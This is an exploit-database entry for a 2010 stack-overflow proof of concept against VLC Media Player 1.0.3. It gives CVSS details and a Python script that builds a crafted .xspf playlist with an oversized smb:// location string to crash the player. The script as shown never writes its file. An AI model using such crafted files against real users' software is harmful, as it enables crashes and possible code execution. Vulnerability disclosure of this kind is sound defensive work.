header-logo
Suggest Exploit
vendor:
VLC Media Player
by:
Dr_IDE
7.8
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: VLC Media Player
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:videolan:vlc_media_player:1.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
Found in 2010

VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC

VLC Media Player 1.0.3 is vulnerable to a stack-based buffer overflow when handling a specially crafted .xspf file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of VLC Media Player
Source

Exploit-DB raw data:

#!/usr/bin/env python

######################################################################################################
#
# VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# Found By:	Dr_IDE
# Tested:	Windows 7
# Download:	http://www.videolan.org
# Note:		Open the .xspf file. It looks like nothing happens but close VLC you will get a crash
#
######################################################################################################

header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com@www.example.com/foo/#{")

payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2 =  ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");

Navigation

Suggest Exploit

Services By CQR